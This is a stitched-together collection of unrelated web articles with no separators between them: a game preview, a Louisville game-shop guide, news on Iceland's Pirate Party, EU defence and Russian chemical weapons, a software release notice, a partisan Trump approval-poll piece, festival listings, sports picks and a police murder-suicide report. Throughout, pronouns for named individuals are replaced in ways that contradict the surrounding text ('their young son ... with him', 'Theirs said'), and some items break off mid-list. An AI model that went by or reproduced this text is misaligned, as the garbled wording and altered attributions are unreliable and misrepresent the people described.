Hello Games' No Man's Sky... Oh my god. OH MY GOD. OH MY GOD AAA. AAAAAHHH AAAAAAAAAAAA!! AAAAAAAAAAAHH!! [screaming] http://t.co/JH1dWKpKZL -- JJSignal (@jjsignal) December 8, 2013
22. The Evil Within
WANNA PLAY THE EVIL WITHIN SO BAD -- Eyo Guzman (@rohirrimshield) January 8, 2014
The evil within, game looks Scary as shit! -- Rigor Mortis (@LovinSomeFatAss) January 7, 2014
21. Dying Light
Dying light looks fucking sick -- Batman? (@SexyMark831) January 5, 2014
why am i the only one hype for dying light -- (@EVA_UNIT_420) January 5, 2014
Share. You may not have been paying much attention to this game. That's a mistake. You may not have been paying much attention to this game. That's a mistake.
After spending over 20 minutes playing through the first level of Puppeteer, I put down my controller, jotted down a few closing notes, and quickly turned to a Sony representative to ask them why Sony isn't talking more about the game. When we first saw Puppeteer at Gamescom in August, there was no doubt that it appeared to be a whimsical affair firmly rooted in the old-school. But after playing it, something else became clear: Puppeteer has incredible potential, and you should be excited about it.
Puppeteer puts you into the role of a young boy named Kutaro, and he's stuck in a rather unusual situation. The ruler of the Moon Realm -- the Moon Bear King -- feasts on the souls of children, and he's got Kutaro in their sights. Escaping the grasp of the Moon Bear King (at least for now), Kutaro jets off through an array of scenes as they elude the Moon Bear King and their minions, but they didn't escape unscathed. They quite literally lost their head in the process, something that proves integral to the way the game plays.
Exit Theatre Mode
The word “scenes” is important in Puppeteer, because the game's presentation relies entirely on the game being a sort of stage show. Moving through levels isn't as literal as it is in other side-scrolling action games; instead, scenery changes around Kutaro constantly, the stage he's on endlessly outfitted with fresh environments, enemies and objectives. And there's a crowd watching the entire time, too, applauding, oohing and ahhing and generally being enamored with Kutaro's plight.
Such a presentation – both in style and graphically – is very reminiscent of something you'd expect from a studio like Media Molecule, the Sony-owned developer behind the LittleBigPlanet series. But Puppeteer comes from elsewhere in Sony's first party stable, from Studio Japan. Gorgeous graphics are complemented by a stirring soundtrack, and there's a humorous slant to just about everything the game does. While the subject matter – children losing their souls to the Moon Bear King – could be construed as dire, Puppeteer successfully comes off far more as a fairy tale than a drama.
This is immediately evident when the game begins. As the British-voiced narrator sets the scene, he's quickly interrupted by the Moon Bear King, who demands they spin the story to put them in a more likable light. By the time you gain control, the whimsical nature of Puppeteer beams to the fore as players switch between controlling Kutaro themselves and a flying cat-like creature named Ying Yang. While Kutaro is charged with the more conventional platforming and combat elements you'd expect to find in a game like this, Ying Yang is occasionally controlled to explore the environment surrounding you by using the right analog stick.
Exploring various environments is vital, because Ying Yang often finds new heads for Kutaro to wear in lieu of the one they lost. In fact, the game revolves heavily around these various heads, switching between them and utilizing the special moves each allows for. While the conventional skull head you find early on doesn't prove to be all that useful, heads ranging from a bat to a spider are integral to your success. Unfortunately, switching between heads on the fly and activating their special powers is executed on the directional pad, which means it can't be used for navigation. So if you want to activate the spider head's power to draw other spiders towards you at special webs, you'll press down on the d-pad. While 2D action-platformers like Puppeteer often demand the directional pad for pinpoint accuracy and control, the left analog stick thankfully does the trick rather nicely.
The dynamic of the game changes early on as well apart from swapping heads. At first, Puppeteer feels somewhat like LittleBigPlanet in that it's not about combat, it's solely about platforming. Eventually, this changes. First, the game begins to throw some enemies at you that you have to dodge and otherwise avoid by jumping and rolling. But after the game's first boss encounter, Kutaro is given a pair of magical scissors (yes, magical scissors) called Calibris, and these add a unique sort of combat to the game.
Calibris doesn't only let you attack enemies directly, slaying creatures and freeing the the children's spirits bound to them. It also allows you to interact in unique ways with the environment and with more powerful enemies that aren't damaged by Calibris' sharp blades. For instance, sticky, spiderweb-like tendrils can be cut by combining the scissors' slashing abilities with jumps and dives. When fighting an enraged knight in a boss battle, the scissors can't damage the armored foe directly, but they can cut and destroy their cloth cape, sending them hurtling to the ground in pieces.
In other words, the interplay between the skulls and Calibris quickly provide an enjoyable experience that's heightened significantly by the game's world, graphics and voice acting. This could be only another side-scrolling platformer in a nearly three decade history of the genre, but it isn't. Whether the final product ends up being great, terrible or somewhere in between, you can count on getting a wholly unique experience in all phases of the game, from its presentation to its combat.
Puppeteer is due out exclusively on PlayStation 3 sometime in 2013. The developer showing me the game refused to give a more exact time table for the game's release, other than to reiterate that it is indeed a retail release. But they did tell me that the game is long. Very, very long for a title in the genre, in fact. They said that if you blew through the game, avoiding extra stages, collecting goods and other exploration, it'll still take you 15 hours. But if you find bonus levels, all of the game's heads and other collectibles and pay attention to collectible Moonsparkles (which give you an extra life for every 100 collected), you can expect to spend far more time with it than that.
So keep Puppeteer on your radars, PlayStation fans. There's something very special about this game. There's absolutely no doubt about it.
Colin Moriarty is an IGN PlayStation editor. You can follow them on Twitter (@notaxation) and IGN (Moriarty-IGN) and learn just how sad the life of a New York Islanders and New York Jets fan can be.
The Definitive Guide to Gaming Stores in Louisville: The Finale!
by Andy B; photographs and map illustrations by Andy B.
The directors of Nerd Louisville conceived the idea of a “Guide to Louisville Gaming Shops.” The original intent was for this guide to be a single feature article. As I set out to research the guide, I realized that this project is too big for a single article. There are at least a dozen gaming shops – maybe more. Instead, I will write multiple installments with a final summary at the end.
The purpose of this guide is to help nerds living in, or visiting, Louisville to find the shops that fit their interests – not just in terms of products, but also their preferred age group, playing style, and atmosphere. The intent is to promote all gaming shops in the city, not to rate them or criticize.
The information in this guide was researched in late 2015. This guide will not provide opening and closing times, since they sometimes change. We wouldn't want you to plan your visit based on this guide if a store changes its hours. For store hours, check each store's website or Facebook page (links provided).
As noted, this is Part Five of a multi-part series. Check out Parts 1-5 if you missed them.
[kleo_divider type=”long” position=”center”]
At long last, I can stick a fork in this game shop guide assignment. I have explored every game shop in Jefferson County, and a few that are in adjacent counties a short drive away. Until another game shop opens or you find one that I missed, I am declaring victory in this catalog of Louisville game shops. In this final chapter I visit Silver Creek Game Shop and update major changes for two shops I visited earlier: Role of the Die and Parallel Worlds.
Silver Creek Game Shop
I had no intention of visiting this shop because I considered it too far away to include in a list of Louisville Game Shops. Then Jesse Rasmussen, Nerd Louisville's Hoosier Advocate, talked me into it. So after taking some lonely roads through the wilderness, I find myself in Sellersburg, Indiana. Is Sellersburg in Louisville? Really? I guess there is no point in arguing further as I am here already.
Address: 947 S Indiana Ave (Sellersburg, Ind.)
947 S Indiana Ave (Sellersburg, Ind.) Facebook: https://www.facebook.com/SilverCreekGameShop/
https://www.facebook.com/SilverCreekGameShop/ History: Owner Josh Caldwell opened Silver Creek Game Shop on December 1 st , 2012 and they have remained in the same shopping center ever since
Owner Josh Caldwell opened Silver Creek Game Shop on December 1 , 2012 and they have remained in the same shopping center ever since Gaming Area: 13 tables with 64 seats
13 tables with 64 seats Crowd: About a dozen gamers on a Saturday evening
About a dozen gamers on a Saturday evening Parking: Located in the Silver Creek Plaza Shopping Center, with lots of parking
Located in the Silver Creek Plaza Shopping Center, with lots of parking The Nearest drink: “It burned down” – that's what Josh told me when I asked; The Silver Creek Lanes bowling alley, with a bar, was at the end of the same shopping center until it was destroyed by fire and now there isn't another drinking place nearby
It was a dark Saturday evening and foggy as a werewolf movie when I arrived at Silver Creek Game Shop. That didn't discourage a dozen or so stalwart gamers from showing up to play collectible card games. Owner, Josh Caldwell, was on hand and their young son, Ethan, was hanging out behind the counter with him. This highlighted one of the distinguishing features of Silver Creek Game Shop: it is very family friendly. Josh brings Ethan along to the shop often and wants everything in the shop to be appropriate for Ethan and other younger kids. Perhaps you are the mom of a young Magic player and perhaps you found this guide after fleeing another Southern Indiana game shop that was full of foul language and hard drinking. In that case, you should try Silver Creek Game Shop. You could have avoided family trauma if you had just checked Nerd Louisville first. Let that be a lesson to you, hypothetical mom.
Silver Creek is primarily a Magic: The Gathering store. They also host Warhammer games and have some terrain models on hand. There is a display of Games Workshop merchandise, and a full stand of Citadel miniature paints. Josh characterizes their core clientelle as competitive Magic players with a laid back attitude. Most of their tournaments are in the standard format. The store sells cold sodas and for food there is Mazarella's Pizza two doors down in the same shopping center.
Return to Role of the Die
As I foretold in my previous description of Role of the Die, the store has moved two miles down Bardstown Road. It is now just a couple of blocks north of the Watterson Expressway.
Address: 2902 Bardstown Road
2902 Bardstown Road Website: http://roleofthedie.net/
http://roleofthedie.net/ Facebook: https://www.facebook.com/Role-of-the-Die-178709688808097/
https://www.facebook.com/Role-of-the-Die-178709688808097/ History: Founded in 2008; purchased in 2014 by the new owner, Michael; moved to new location in December 2015
Founded in 2008; purchased in 2014 by the new owner, Michael; moved to new location in December 2015 Gaming Area: One large permanent table, with room for two additional tables on demand; all three tables were in use when I ran a Call of Cthulhu game there on the Saturday after New Year's
One large permanent table, with room for two additional tables on demand; all three tables were in use when I ran a Call of Cthulhu game there on the Saturday after New Year's Crowd: Three full gaming groups on the Saturday after New Year's; I was running a Call of Cthulhu game, another group was playing Dungeons & Dragons, and the group at the third table was playing a board game
Three full gaming groups on the Saturday after New Year's; I was running a Call of Cthulhu game, another group was playing Dungeons & Dragons, and the group at the third table was playing a board game Parking: Now, much easier than the previous location; the store is in a small shopping center with forty parking places shared with a few other small businesses and there are other parking lots in walking distance
Now, much easier than the previous location; the store is in a small shopping center with forty parking places shared with a few other small businesses and there are other parking lots in walking distance The Nearest drink: This shop is no longer surrounded by bars, but all is not lost: there is a bar in the El Nopal restaurant in the Gardiner Lane Shopping Center, just on the other side of the Krispy Kreme; when my buddy, John, and I stopped in for a drink after our Call of Cthulhu game, we ran into some other Role of the Die customers who beat us there
It only took Michael's team one day to move their shop to the new location at the beginning of December. It is the same square footage as their old location but Michael is more pleased with the layout. To recap for those who don't recall my earlier description in the third episode of this guide, Role of the Die sells both comics and games. The owner and their regular customers are devoted fans of 4th edition Dungeons and Dragons. If you are a 4E player, this is the shop for you.
The comics and merchandise are much the same as the old location, although there is a new display of Wiz Dice polyhedral gaming dice sets. The new venue doesn't have the old store's Star Trek captain's chair but the front door still makes the sliding door sound effect. Michael has been a great host for our Saturday Call of Cthulhu games at the new site, so Role of the Die has my endorsement. Overall, the new location for Role of the Die is quieter and more suburban than the previous spot in the heart of the Bardstown Road nightlife strip. They no longer have to deal with drunken revelers wandering in, except perhaps for me I guess.
Parallel Worlds Between Worlds
In October, the owner of Parallel Worlds announced that they would be closing and moving to a new location. In December, they posted on Facebook that Parallel Worlds would remain closed indefinitely. Here is the unedited Facebook post:
An address of the status of PWG by Randall Lee Daniel, owner.
Parallel Worlds Gaming will not be reopening on any schedule that I can determine at this juncture. Although I have full intent to spend my life as a card shop owner and will in fact reopen in the future, be it under the banner of PWG or otherwise. I will however have a very much different shop, modeled more so the way I intended it from the start. I apologize for the delays of reopening and the delays of this address. My decision to further suspend to reopen merits two main causes.
Firstly, the shop was never what it should have been. I purchased a shop that was not as intended and while I have invested the last year of my life and a large amount of money fighting an uphill battle to fix this fact, I have made limited head way. I have determined that I would prefer to fix the underlying issues before reentering the situation. By operating without a physical location I have lowered my overhead dramatically and will be able to hold better profit margins allowing me to settle due accounts in a more timely manner. The second and main reason being personal and not warranting public explanation.
In regards to accounts due, debts owed or other financial concerns voiced by customers, I will work as swiftly as I can to raise capital to repay any in-store credit or otherwise owed debts. Message me personally on here to address these issues, link below.
For any party requesting additional information I will provide it upon personal request at my leisure, as I am busy resolving my issues surrounding this change in both my personal and professional life. I wish you all a Merry Christmas and a Happy New Year, may your Holidays be married and all of that other jazz.
https://www.facebook.com/randall.daniel.10
I contacted Randall and asked them if they wanted to add anything for this Game Store Guide. We met to talk over drinks at Kaiju in Germantown on New Year's Day. Randall explained that they aren't happy with the location of Parallel Worlds, which they inherited. They said they made a deal with the owners of the shopping center, who wanted their location in order to expand the store next door. They said they still have a huge inventory of Magic cards that they are selling online through TCGPlayer and Ebay. As Randall explains it, they still have roughly the same amount of sales, but without the overhead of the physical store, although they really misses the social aspect of running a game shop. Theirs said their house is filled with display cases and other inventory from the store.
“My heating bill for this winter should be pretty low, thanks to the insulation I've got from boxes and boxes of Magic cards stacked against all the walls of my house” they joked.
Randall asked me to emphasize that anyone who had store credit from Parallel Worlds should contact them through Facebook. Randall said they are considering plans for a new shop or other gaming enterprise. We discussed their plans for a new style of LARP (Live Action Role Playing) and other gaming ideas they are pondering. They told me some crazy stories about running a LARP group in Shepherdsville when they were a teenager. It's always interesting to talk about gaming with Randall and I'm curious to find out what they try next.
This concludes our tour of the gaming stores in Louisville until I hear about any new shops in town. I've learned quite a bit from researching these shops – mostly that Louisville is pretty damned nerdy. I hope that you have found the guide worthwhile.
Game on, nerds!
The Definitive Guide to Gaming Stores in Louisville will be a multi-part series of Nerd Louisville articles until all the gaming stores in Louisville are included. If you'd like your store to be featured next, please contact us! Please send corrections to andy@nerdlouisville.org.
Birgitta Jonsdottir is a self-described pirate poet who once lived near Mullumbimby — and they could be the next prime minister of Iceland.
In an interview with Lateline, the leader of Iceland's Pirate Party said their year on the New South Wales North Coast inspired them to make a change to society.
"I felt it was a healthy way to see yourself, to go to the absolute end of the world and to go and do some inner work and try and understand better how I can function actually in Iceland," they said.
"I guess that sort of inspiration came to me in Australia. It was a very interesting year."
Ms Jonsdottir lived in Crabbes Creek, their ex father-in-law was the mayor of Lismore and their youngest son was born in Melbourne.
"Somebody said about me, one year in my life is seven years for others, so it sort of felt like I lived for many years in Australia," they said.
The Pirate Party that Ms Jonsdottir co-founded in 2012 only holds three seats in Iceland's parliament but it has the support of 43 per cent of Iceland's voters.
With Iceland's prime minister Sigmundur David Gunnlaughsson forced to resign in the wake of the Panama Papers scandal, Ms Jonsdottir's Pirates have a real likelihood of taking power in the country of just over 320,000 people.
But they told Lateline they do not think they are the best person for the job.
"I am a very controversial person so maybe that is not the right person to be the prime minister," they said.
Unemployed single mother to WikiLeaks activist
Seven years ago, Ms Jonsdottir was an unemployed single mother of three, who had an urge to "improve society".
They volunteered to work for WikiLeaks, met Julian Assange, and in 2010 played a crucial role in the release of Collateral Murder, the classified US military video that shows an American helicopter gunning down Iraqi civilians and two Reuters journalists in Baghdad.
The Pirate Party's key platforms are freedom of expression, information and digital privacy and Ms Jonsdottir said they would encourage Julian Assange and Edward Snowden to apply for Icelandic citizenship.
"Both have rendered service to humankind by showing us information or facilitating," they said.
Ms Jonsdottir puts their sense of social responsibility down to growing up in a fishing village as a "freaky outcast" and an "ugly duckling".
"I somehow, in my alienation as a kid, learned to... turn these difficulties into strength," they said in a TED talk in Reykjavik last year.
Both their father and husband committed suicide within a few years of each other and Ms Jonsdottir said those crises in their personal life shaped them into a stronger person.
"I learned to live and cope in a situation of extreme uncertainty and that has really helped me later in life to deal with very extreme circumstances. There was never a night I could not fall asleep," they said.
VILNIUS (Reuters) - Germany's defense minister called for a European “defense union” on Thursday during a visit to the Baltic state of Lithuania, where Berlin is preparing to lead a battle group of about 1,000 troops as a deterrence against neighboring Russia.
German Defence Minister Ursula von der Leyen arrives for a cabinet meeting at the Chancellery in Berlin, Germany August 24, 2016. REUTERS/Stefanie Loos
The European Union has long considered forging closer defense ties while not undermining the U.S.-led NATO alliance, to which many EU member states also belong, especially in the face of a more aggressive Russia and worsening conflicts in the Middle East.
The decision of Britain, a staunch opponent of any EU “army”, to quit the EU has also removed an obstacle to the closer European defense cooperation favored by Germany, France and many eastern European countries.
“It's time to move forward to a European defense union, which is basically a ‘Schengen of defense',”, Ursula von der Leyen told reporters in the Lithuanian capital Vilnius.
“That is what the Americans expect us to do.”
Schengen refers to the passport-free zone covering much of Europe, a pillar of the more integrated Europe that Germany strongly supports.
German Chancellor Angela Merkel also recently endorsed the idea of more joint military operations with the three Baltic republics, all NATO and EU members which have felt especially vulnerable following Russia's annexation of Ukraine's Crimea peninsula and its support for separatists in eastern Ukraine.
Germany already has close military ties and joint forces with Poland, the Netherlands and France outside NATO structures, though Berlin and Paris also say they do not envisage establishing a European army.
“When we have threats that are surrounding us, we all know no country by its own will be able to manage that. But we together, we Europeans, we are very strong if we improve our capabilities as Europeans,” von der Leyen said.
The German-led battle group in Lithuania will operate air defenses when it is deployed early next year, they added.
“There will be a comprehensive air defense”, they said. “We are very glad that we find many European friends who want to join, like the Dutch or the French, for example.”
NATO leaders agreed in July to move four battalions totaling 3,000 to 4,000 troops to the Baltic states and eastern Poland for the first time and to increase air and sea patrols to reassure those countries following Russia's seizure of Crimea.
The Apache OpenMeetings project is pleased to announce the release of Apache OpenMeetings 4.0.1. The release is available for download from http://openmeetings.apache.org/downloads.html Apache OpenMeetings provides video conferencing, instant messaging, white board, collaborative document editing and other groupware tools using API functions of the Red5 Streaming Server for Remoting and Streaming. Release 4.0.1, provides following improvements: * Openlaszlo code is removed * Login via OAuth is improved * External video source is room is fixed * Multiple improvements of White-board * Multiple improvements of Chat * JS/CSS files are minified and merged to reduce load time * Overall stability is improved Other fixes and improvements, 43 issues are fixed Readme: https://github.com/apache/openmeetings/blob/4.0.1RC1/README Changelog: https://www.apache.org/dist/openmeetings/4.0.1/CHANGELOG List of fixed issues: https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12312720&version=12342042 For more information on Apache Openmeeting please visit project home page: http://openmeetings.apache.org Apache OpenMeetings Team
Throughout the transition period, the liberal media was constantly harping on the fact that several polls showed that President Donald Trump's approval rating was still in the dirt.
What the media hasn't told you in recent days is that Trump's approval rating has started to take off. The latest poll from Rasmussen Reports showed this trend quite clearly.
On Jan. 20, Trump's approval index — the number resulting when disapprovals are subtracted from approvals — was plus two. On Jan. 23, it shot up to plus four, and on Jan. 24 it continued to climb to a whopping plus nine.
That's an incredible climb in only a few days.
Trump's total approval rating rose two points between Jan. 20 and Jan. 24, 55 percent to 57 percent. The percentage of respondents who “strongly approve” of Trump rose from 38 percent on Jan. 20 to 42 percent on Jan. 24.
The most likely reason for this climb is that Trump has worked hard over the past few days, holding meetings with labor groups and various companies. Americans can see what he's doing, instead of only listening to the biased mainstream media's horror stories of what they might do.
Trump has also signed a series of executive orders aimed at making it easier to do business in America. Some of their other orders also helped create jobs (or the potential for jobs) by approving the Keystone pipeline project.
Trump has shown in just a few days that they are a man of action, and the American people can respect that. Trump may still do things that irritate some people, but the American people are more interested in what they can accomplish for the country as president.
It will be interesting to see if Trump's approval rating continues to climb in the coming days and weeks. Trump has reportedly been preparing a large number of executive orders aimed at curbing immigration and refugee flows from countries overrun with terrorism — something that many Americans have been hoping they will do.
Trump has followed through on their campaign promises so far. If they continue to do that, there is no reason why their approval numbers shouldn't continue to climb. Like us on Facebook – USA Liberty News Share this on Facebook and Twitter and let us know what you think Trump's approval rating will look like in four years.
What do you think of this poll? Scroll down to comment below!
Source: conservativetribune.com
H/T Breitbart
The Milwaukee Avenue Arts Fest returns to transform Logan Square into Chicago's biggest pop-up district June 27-29. View Full Caption Facebook
LOGAN SQUARE — The Milwaukee Avenue Arts Fest will return next week to transform Logan Square into Chicago's biggest pop-up art district.
Fest organizers announced the full artist lineup Wednesday for the 6th annual arts gathering, set for June 27-29. The three-day cultural event will transform Logan Square into a pop-up art district, with a diverse collection of local and national-touring bands, food vendors and interactive family activities.
The festival, presented by I AM Logan Square, takes place in the heart of Logan Square — Milwaukee Avenue from Kedzie Avenue to the intersection of Diversey and Kimball avenues.
The one-of-a-kind street fair will feature dozens of visual artists, two stages of live music, pop-up art galleries and installations, interactive activities and food from the neighborhood restaurants like Reno and Lula Cafe.
Weekend offerings at the fest include a slew of family friendly events such arts and crafts, sand pits, face painters, exotic petting zoo, Busy Beaver Button workshops and dance classes.
The full music lineup:
Friday, June 27
North Stage
Hologram Kizzie a.k.a. Psalm One - 8:45 p.m.
DJ Lugo Rosado featuring The Latin Music Project - 7:15 p.m.
Royal Pines - 5:45 p.m.
South Stage
Night Moves - 8:30 p.m.
Treasure Fleet - 7 p.m.
Damn Choir - 5:30 p.m.
Saturday, June 28
North Stage
Tré - 8:15 p.m.
Secret Colours - 6:45 p.m.
North By North - 5:15 p.m.
Rabble Rabble - 4 p.m.
Black Bear Combo - 2:30 p.m.
Street Sounds - 12:30 p.m.
South Stage
Sierra Leone's Refugee All-Stars - 8:15 p.m.
Landmarks - 6:45 p.m.
VILLAGE - 5:30 p.m.
Electric Hawk - 4:30 p.m.
Pat Sansone - 3:30 p.m.
Kory Quinn - 1:30 p.m.
Intonation Music Workshop All-Stars - 12:15 p.m.
Sunday, June 29
North Stage
Angel Melendez - 8:15 p.m.
Baliff - 6:45 p.m.
The Funs - 5:45 p.m.
Melkbelly - 5 p.m.
Angel d' Cuba - 3:30 p.m.
Opposition Party - 2:00 p.m.
Will Phalen - 12:30 p.m.
South Stage
The Blind Shake - 8:30 p.m.
Archie Powell and the Exports - 7 p.m.
Tyvek - 5:30 p.m.
Mazes - 4:15 p.m.
Negative Scanner - 3:30 p.m.
Vamos! - 2:30 p.m.
Little Fires - 1:45 p.m.
Quarter Mile Thunder - 12:15 p.m.
The full visual arts lineup:
Amie Sell
Autotelic
Beauty & Brawn
Comfort Station
E. Aaron Ross
Falon Mihalic
F'art Collective
Guanyu Xu
Hye-Jeong Lee
Inuit: Center for Intuitive and Outsider Art
Jesús Mejía + Ruth
Kayla Nirschel
Klaus Pinter
Megan Cho
PRAA
Scott Wolniak
Seung Jae Kim
SLAC
Society of Smallness
Woman Made
The festival requests a $5 donation to benefit I AM Logan Square. Hours are 5-10 p.m. June 27; noon-10 p.m. June 28 and 29. For more information email info@imalogansquare.com or visit the fest website.
For more neighborhood news, listen to DNAinfo Radio here:
Russia has ended the destruction of its chemical arsenal ahead of schedule, President Vladimir Putin said. Putin described the event as historic given the huge amount of chemical weapons left over from Soviet times, reports TASS.
"Although our country was planning to complete this work by 2020, it ended earlier than the deadline," they said. In a statement broadcast on "Russia 24", Putin noted that the United States failed to fulfill its commitment to destroy its chemical arsenal and three times they postponed it on the grounds that they lack the resources.
The use of the last chemical munitions of a polygon in the Russian republic of Udmurtia was made today by order of Supreme Commander Vladimir Putin. They have issued the telecommand order from their residence in Novo Ogarevo near Moscow. For its chemical disarmament, Russia has received financial assistance from 16 countries, as well as from the European Union and an American non-governmental organization, TASS recalls. Most funds have been disbursed by the United States, Germany, the United Kingdom and Canada.
Alamo Drafthouse seeks feedback on gender-neutral bathroom design Copyright by KXAN - All rights reserved Proposed Alamo Drafthouse bathroom idea - Alamo Drafthouse Facebook page [ + - ] Video
AUSTIN (KXAN) -- Alamo Drafthouse founder, Tim League, is seeking input on the hot button issue of the moment, bathrooms and the genders able to use them.
They decided to scrap the approved bathroom for the new Mueller location which is currently under construction, and go back to the drawing board with Drafthouse Architect Richard Weiss.
"We've been thinking about what an inclusive commercial gender-neutral restroom design might look like so that these challenges are not even part of the dialogue," League said in a Facebook post.
Their goal is to come up with an idea that will fulfill all needs while being comfortable and meeting the city code.
"It's the stories you hear of transgender kids getting beat up in high school bathrooms," League told KXAN. "That's a real problem and like I say, you can't necessarily change everybody's mind immediately on these issues but you can hopefully by design eliminate conflict."
The working draft, which was posted on Facebook, is one large bathroom with a section of urinals behind one door and individual stalls for seated toilets. League said they are considering a type of urinal both men and women can use. So, what does an all gender urinal look like?
"It's new territory," said Weiss. "It's something we're looking into. It's essentially a urinal that has a throat that comes out it's a deeper stall."
Larger ADA accessible bathrooms would be across the hall and those would be equipped with baby changing stations.
"The ultimate goal is that everybody should be able to do what they want to do where they want to do it," said Weiss.
When League started researching ideas, they said there was not much to go on.
 They are certain the new inclusive bathroom will not include any female or male signs, and will likely serve as a model for all Drafthouse locations built in the future.
What do you think?
https://www.facebook.com/AlamoAustin/photos/a.127523970636500.36743.100754223313475/1017815958273959/?type=3&theater
Welcome to Week 8! Visit our college football PickCenter page for additional information on these games and many more.
Here are the Pac-12 blog's game picks:
Oregon at California
10:30 p.m. ET Friday (ESPN & WatchESPN)
NAME PICK SCORE Kyle
Bonagura 42-35 Kevin
Gemmell 38-31 Chantel
Jennings 38-31 David
Lombardi 48-44 Ted
Miller 41-35
Colorado at Stanford
3 p.m. ET Saturday (Pac-12 Network)
NAME PICK SCORE Kyle
Bonagura 31-24 Kevin
Gemmell 24-17 Chantel
Jennings 21-20 David
Lombardi 24-20 Ted
Miller 24-17
No. 19 Utah at UCLA
4 p.m. ET Saturday (FOX)
NAME PICK SCORE Kyle
Bonagura 20-17 Kevin
Gemmell 27-21 Chantel
Jennings 24-17 David
Lombardi 24-20 Ted
Miller 20-17
Oregon State at No. 5 Washington
6:30 p.m. ET Saturday (Pac-12 Network)
NAME PICK SCORE Kyle
Bonagura 45-6 Kevin
Gemmell 49-10 Chantel
Jennings 49-6 David
Lombardi 51-13 Ted
Miller 44-17
Washington State at Arizona State
10 p.m. ET Saturday (Pac-12 Network)
Actually, we're not sure beating people up is entirely legal, either.
(Credit: Warner Bros)
A man who dressed as Batman and delivered a wanted man to their local cop shop has now been arrested for burglary — and their accomplice is the same man they took in to the police last month.
Just over a month ago, a man made global headlines when, dressed as Batman, they delivered to their local Bradford, UK, police station a man who was wanted on several warrants. The mystery man turned out to be a 39-year-old delivery driver by the name of Stan Worby, and the wanted man is their friend, 27-year-old Danny Frayne, who had asked Worby to drive them to the police station.
Worby, who had attended a football match in fancy dress, took the opportunity to play a prank. They marched into the police station with Frayne, told them, "I've caught this one for you," and went home, to the befuddlement and amusement of the officers on duty.
At the time, Worby told The Telegraph, "I've never done fancy dress before, it's not my thing. So for this to happen the first time I dress up, I just can't believe it."
Now, the two men have once again come to police attention, when officers stopped their vehicle at 4am local time on Sunday and found £770 worth of stolen power tools, nicked from a nearby garage. Ironically, it had been Worby who had convinced Frayne to turn themselves in back in March.
The pair was arrested and charged with burglary. Frayne, who appeared before Bradford Magistrates' Court on Monday, pleaded not guilty; they are due to reappear before the court with Worby on 26 April. Maybe Worby should turn in their cape, cowl and utility belt while he's at it.
Via www.telegraph.co.uk
Conservative pundit Rush Limbaugh offered a bold assessment of Hurricane Matthew on Wednesday: the category 4 storm was exaggerated by the Obama administration in order to validate climate change theories.
At the crux of Limbaugh's argument was the so-called ‘hurricane drought' in the United States, which ended when Matthew made landfall in Florida last week. After Hurricane Katrina struck New Orleans in 2005, former vice president Al Gore predicted that hurricane activity would increase as a result of human-made warming.
“And then what happened? We had 11 years of no hurricanes – 11 straight years of no major hurricanes striking land in the United States, which just bores a hole right through the whole climate change argument,” Limbaugh said on their talk radio show. “They want people to think this way: Hurricane reported. Must be climate change.”
Limbaugh is technically correct: no major hurricane system has made landfall in the US since Hurricane Wilma ripped through Florida in 2005. But they fail to mention Hurricane Sandy, which was the second most costly weather disaster in American history. Sandy is only absent from the list because it degraded to a category 2 storm just before slamming the New Jersey coast.
Due to the complexity of both climate and weather systems, it's notoriously difficult to link natural disasters directly to climate change. But hurricane droughts notwithstanding, new research suggests that storm systems are worsening as a result of increased global temperatures.
In September, researchers from the University of North Carolina found that tropical cyclones in East and Southeast Asia have increased – both in strength and frequency – over the last 40 years. That trend could be attributed to warmer surface water, which can give tropical storms a boost just as they approach the coast.
Another study, conducted by scientists at the National Oceanic and Atmospheric Administration (NOAA), found that major flooding is also a growing global issue. Floods like the one that devastated Louisiana in August, the study found, should only occur about once every 500 to 1,000 years. There have been eight in the US alone since May 2015.
Political affiliation plays a major role in the way Americans perceive climate issues, recent studies find. According to a poll by the Pew Research Center, liberals tend to trust climate scientists and support political efforts to prevent further warming. Conservatives are generally more skeptical, and question the impact of political or personal action.
Get the Monitor Stories you care about delivered to your inbox. By signing up, you agree to our Privacy Policy
The disparity is compounded by a recent streak of good weather in the US. In April, researchers found that 80 percent of the country's population is experiencing better weather than it did 40 years ago: That means fewer snowstorms in the winter and only small increases in summer humidity. The trend is great for US citizens, but it may also work against climate awareness.
The Christian Science Monitor's Story Hinckley reported:
Dallas police confirmed Thursday that a Crandall police officer shot and killed their wife before killing himself. (Published Thursday, Feb. 27, 2014)
Dallas police confirmed Thursday that a Crandall police officer shot and killed their wife before killing himself.
The bodies of Sgt. Nick Pitofsky and their wife, Vanessa, were found inside a home in the Cedars neighborhood Wednesday.
According to the Dallas Police Department, a welfare check was requested at a home on the 1800 block of Browder Street shortly after noon. When officers arrived at the home, they requested the assistance of Dallas Fire-Rescue to break through the door.
Officers entered the home and found a man and woman, later identified as Crandall Police Officer Sgt. Nick Pitofksy and their wife, Vanessa Pitofsky, dead from apparent gunshot wounds.
Police Officer, Wife Dead in Possible Murder-Suicide
Dallas police are investigating the deaths of a Crandall police officer and their wife whose bodies were found inside a home in the Cedars neighborhood Wednesday. (Published Thursday, Feb. 27, 2014)
Dallas police confirmed Thursday that they are treating the case as a murder-suicide. Police did not say what may have led up to the slaying.
Construction workers across the street from the home told NBC 5 they heard nothing strange in the hours before the bodies were found, including no loud noises or gunshots. Guests at a nearby motel said the same.
Neighbors in the Cedars neighborhood told NBC 5 that though the couple was rarely seen together, they were nice people and there was never any hint of trouble.
According to the Texas Commission on Law Enforcement, Pitofsky had been with the Crandall Police Department since May 2012. Before that, they were an unpaid reserve officer with the Dallas Police Department from January 2008 to May 2012 and a jailer with the Dallas County Sheriff's Office from January 2007 until August 2007.
The Crandall Police Department issued the following statement Wednesday afternoon:
"It is with a heavy heart we regret to inform the public that Nick Pitofsky and their wife, Vanessa, were found deceased in their Dallas apartment on 2/26 by the Dallas Police Department. Dallas PD is investigating the incident as a possible murder-suicide. No other information has been confirmed by DPD at this time. Nick Pitofsky was a Patrol Sergeant for the Crandall Police Department and has been employed with the city for two years. Nick was well respected by their peers and will be deeply missed by the city and department as a whole. Nick was an energetic and jovial person who got along with everyone. Nick was an extremely dedicated Police Officer for the City of Crandall and its citizens. Sergeant Nick Pitofsky will be deeply missed by their fellow Officers. The Crandall Police Department would also like to send our condolences to the family of both Nick and Vanessa Pitofsky. "
A Dallas Morning News article published in February 2012 said Pitofsky was given the Reserve Officer of the Year Award by the Dallas Police Department.
The DPD said reserve officers are given uniforms and the power to make arrests with on duty with the department and are primarily used to assist in large scale events. The department said theses officers have a minimum commitment to work 16 hours a week for DPD.
